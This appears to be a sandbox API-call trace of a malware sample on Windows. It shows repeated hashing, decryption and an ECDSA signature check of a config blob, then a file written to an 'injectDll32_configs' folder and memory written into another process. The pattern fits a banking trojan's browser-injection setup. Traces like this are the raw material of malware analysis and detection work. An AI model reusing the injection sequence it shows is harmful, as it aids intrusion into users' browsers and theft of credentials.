	[0191.375] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301068
	[0191.375] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301068, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301068, pdwDataLen=0x1283b0) returned 1
	[0191.375] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.375] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.375] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.376] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.376] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xe80, dwFlags=0x0) returned 1
	[0191.376] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301090
	[0191.376] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301090, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301090, pdwDataLen=0x1283b0) returned 1
	[0191.376] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.376] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.376] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.376] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.376] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xea0, dwFlags=0x0) returned 1
	[0191.376] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23010b8
	[0191.376] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23010b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23010b8, pdwDataLen=0x1283b0) returned 1
	[0191.377] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.377] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.377] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.377] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.377] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xec0, dwFlags=0x0) returned 1
	[0191.377] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23010e0
	[0191.377] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23010e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23010e0, pdwDataLen=0x1283b0) returned 1
	[0191.377] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.377] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.377] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.378] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.378] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xee0, dwFlags=0x0) returned 1
	[0191.378] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301108
	[0191.378] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301108, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301108, pdwDataLen=0x1283b0) returned 1
	[0191.378] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.378] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.378] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.378] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.378] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xf00, dwFlags=0x0) returned 1
	[0191.378] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301130
	[0191.378] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301130, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301130, pdwDataLen=0x1283b0) returned 1
	[0191.378] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.378] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.378] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.379] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.379] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xf20, dwFlags=0x0) returned 1
	[0191.379] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301158
	[0191.379] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301158, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301158, pdwDataLen=0x1283b0) returned 1
	[0191.379] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.379] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.379] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.379] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.379] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xf40, dwFlags=0x0) returned 1
	[0191.379] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.379] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301180
	[0191.379] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301180, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301180, pdwDataLen=0x1283b0) returned 1
	[0191.379] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.379] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.379] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.380] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.380] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xf60, dwFlags=0x0) returned 1
	[0191.380] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23011a8
	[0191.380] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23011a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23011a8, pdwDataLen=0x1283b0) returned 1
	[0191.380] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.380] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.380] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.380] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.380] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xf80, dwFlags=0x0) returned 1
	[0191.380] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.380] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23011d0
	[0191.380] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23011d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23011d0, pdwDataLen=0x1283b0) returned 1
	[0191.380] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.380] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.380] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.381] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.381] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xfa0, dwFlags=0x0) returned 1
	[0191.381] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23011f8
	[0191.381] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23011f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23011f8, pdwDataLen=0x1283b0) returned 1
	[0191.381] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.381] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.381] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.382] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.382] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0xfc0, dwFlags=0x0) returned 1
	[0191.382] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.382] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301220
	[0191.382] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301220, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301220, pdwDataLen=0x1283b0) returned 1
	[0191.382] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.382] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.382] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.383] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.383] CryptHashData (hHash=0x22b6940, pbData=0x2752bd0, dwDataLen=0xfe0, dwFlags=0x0) returned 1
	[0191.383] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301248
	[0191.383] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2301248, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301248, pdwDataLen=0x1283b0) returned 1
	[0191.383] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0191.383] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.383] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0191.383] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0191.383] CryptHashData (hHash=0x22b6900, pbData=0x2752bd0, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0191.383] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0191.383] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301270
	[0191.383] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2301270, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2301270, pdwDataLen=0x1283b0) returned 1
	[0191.383] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.383] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.383] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2752bd0) returned 1
	[0191.383] CryptAcquireContextW (in: phProv=0x1283dc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283dc*=0x225748) returned 1
	[0191.384] CryptImportKey (in: hProv=0x225748, pbData=0x1283a4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x1283e4 | out: phKey=0x1283e4*=0x22b6940) returned 1
	[0191.384] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x4, pbData=0x1283d0*=0x1, dwFlags=0x0) returned 1
	[0191.384] CryptSetKeyParam (hKey=0x22b6940, dwParam=0x1, pbData=0x2301270, dwFlags=0x0) returned 1
	[0191.384] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x205f0) returned 0x2772bb8
	[0191.385] CryptDecrypt (in: hKey=0x22b6940, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2772bb8, pdwDataLen=0x1283d8 | out: pbData=0x2772bb8, pdwDataLen=0x1283d8) returned 1
	[0191.386] CryptDestroyKey (hKey=0x22b6940) returned 1
	[0191.386] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.386] GetVersion () returned 0x1db10106
	[0191.386] CryptAcquireContextW (in: phProv=0x1282e4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1282e4*=0x225748) returned 1
	[0191.387] CryptCreateHash (in: hProv=0x225748, Algid=0x800d, hKey=0x0, dwFlags=0x0, phHash=0x1282e8 | out: phHash=0x1282e8) returned 1
	[0191.387] CryptHashData (hHash=0x22b6900, pbData=0x2772bb8, dwDataLen=0x20574, dwFlags=0x0) returned 1
	[0191.388] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1282e0, pdwDataLen=0x1282dc, dwFlags=0x0 | out: pbData=0x1282e0, pdwDataLen=0x1282dc) returned 1
	[0191.388] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0191.388] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x22a6490, pdwDataLen=0x1282e0, dwFlags=0x0 | out: pbData=0x22a6490, pdwDataLen=0x1282e0) returned 1
	[0191.388] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0191.388] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0191.388] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x1283e4, pszAlgId="ECDSA_P384", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x1283e4) returned 0x0
	[0191.389] BCryptImportKeyPair (in: hAlgorithm=0x22ee2a8, hImportKey=0x0, pszBlobType="ECCPUBLICBLOB", phKey=0x1283ec, pbInput=0x211118, cbInput=0x68, dwFlags=0x0 | out: phKey=0x1283ec) returned 0x0
	[0191.391] BCryptGetProperty (in: hObject=0x2299c50, pszProperty="SignatureLength", pbOutput=0x128404, cbOutput=0x4, pcbResult=0x1283dc, dwFlags=0x0 | out: pbOutput=0x128404, pcbResult=0x1283dc) returned 0x0
	[0191.391] BCryptVerifySignature (hKey=0x2299c50, pPaddingInfo=0x0, pbHash=0x22a6490, cbHash=0x30, pbSignature=0x279312c, cbSignature=0x60, dwFlags=0x0) returned 0x0
	[0191.393] BCryptDestroyKey (in: hKey=0x2299c50 | out: hKey=0x2299c50) returned 0x0
	[0191.393] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x22ee2a8, dwFlags=0x0 | out: hAlgorithm=0x22ee2a8) returned 0x0
	[0191.393] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0191.393] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20570) returned 0x27931b0
	[0191.395] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x264e00) returned 1
	[0191.395] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2301270) returned 1
	[0191.395] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2772bb8) returned 1
	[0191.395] GetFileAttributesW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs")) returned 0xffffffff
	[0191.395] PathRemoveBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs") returned=""
	[0191.395] CreateDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs"), lpSecurityAttributes=0x0) returned 1
	[0191.397] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\") returned=""
	[0191.397] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4b0
	[0191.398] WriteFile (in: hFile=0x4b0, lpBuffer=0x2732590*, nNumberOfBytesToWrite=0x20620, lpNumberOfBytesWritten=0x128444, lpOverlapped=0x0 | out: lpBuffer=0x2732590*, lpNumberOfBytesWritten=0x128444*=0x20620, lpOverlapped=0x0) returned 1
	[0191.401] CloseHandle (hObject=0x4b0) returned 1
	[0191.404] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a)) 
	[0191.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dinj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5
	[0191.404] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff270
	[0191.404] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dinj", cchWideChar=-1, lpMultiByteStr=0x22ff270, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dinj", lpUsedDefaultChar=0x0) returned 5
	[0191.404] lstrlenA (lpString="dinj") returned 4
	[0191.404] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x40) returned 0xe0000
	[0191.404] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xe0000, lpBuffer=0x22ff270*, nSize=0x5, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x22ff270*, lpNumberOfBytesWritten=0x127f34*=0x5) returned 1
	[0191.405] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2056c, flAllocationType=0x3000, flProtect=0x40) returned 0x230000
	[0191.405] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x230000, lpBuffer=0x27931b0*, nSize=0x2056c, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x27931b0*, lpNumberOfBytesWritten=0x127f34*=0x2056c) returned 1
	[0191.409] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x40) returned 0x210000
	[0191.409] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x210000, lpBuffer=0x127fc0*, nSize=0x400, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x127fc0*, lpNumberOfBytesWritten=0x127f34*=0x400) returned 1
	[0191.409] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x40) returned 0x5c0000
	[0191.410] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0*, nSize=0x80, lpNumberOfBytesWritten=0x127f34 | out: lpBuffer=0x1283c0*, lpNumberOfBytesWritten=0x127f34*=0x80) returned 1
	[0191.410] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x8, flAllocationType=0x3000, flProtect=0x40) returned 0x5d0000
	[0191.410] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e94 | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e94*=0x70) returned 1
	[0191.410] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0191.410] VirtualAllocEx (hProcess=0x47c, lpAddress=0x0, dwSize=0x2c, flAllocationType=0x3000, flProtect=0x40) returned 0x5e0000
	[0191.411] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5e0000, lpBuffer=0x22a6490*, nSize=0x2c, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x22a6490*, lpNumberOfBytesWritten=0x127e8c*=0x2c) returned 1
	[0191.411] WriteProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4*, nSize=0x70, lpNumberOfBytesWritten=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesWritten=0x127e8c*=0x70) returned 1
	[0191.411] ResetEvent (hEvent=0x478) returned 1
	[0191.411] SignalObjectAndWait (hObjectToSignal=0x468, hObjectToWaitOn=0x478, dwMilliseconds=0x7530, bAlertable=0) returned 0x0
	[0191.627] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60000, lpBuffer=0x127eb4, nSize=0x70, lpNumberOfBytesRead=0x127e8c | out: lpBuffer=0x127eb4*, lpNumberOfBytesRead=0x127e8c*=0x70) returned 1
	[0191.627] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0191.627] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22a6490) returned 1
	[0191.627] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5c0000, lpBuffer=0x1283c0, nSize=0x80, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x1283c0*, lpNumberOfBytesRead=0x127f48*=0x80) returned 1
	[0191.627] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x210000, lpBuffer=0x127fc0, nSize=0x400, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127fc0*, lpNumberOfBytesRead=0x127f48*=0x400) returned 1
	[0191.627] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x5d0004, lpBuffer=0x127f74, nSize=0x4, lpNumberOfBytesRead=0x127f48 | out: lpBuffer=0x127f74*, lpNumberOfBytesRead=0x127f48*=0x4) returned 1
	[0191.627] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0191.627] VirtualFreeEx (hProcess=0x47c, lpAddress=0x5c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0191.627] VirtualFreeEx (hProcess=0x47c, lpAddress=0x230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0191.628] VirtualFreeEx (hProcess=0x47c, lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0191.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27931b0) returned 1
	[0191.629] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2732590) returned 1
	[0191.633] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\sinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\sinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0191.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5bc47b00, dwHighDateTime=0x1d50a6a)) 
	[0191.633] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128454 | out: lpSystemTimeAsFileTime=0x128454*(dwLowDateTime=0x5bc47b00, dwHighDateTime=0x1d50a6a)) 
	[0191.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2301270
	[0191.633] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22c6f60) returned 1
	[0191.633] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a6490
	[0191.633] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0191.633] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
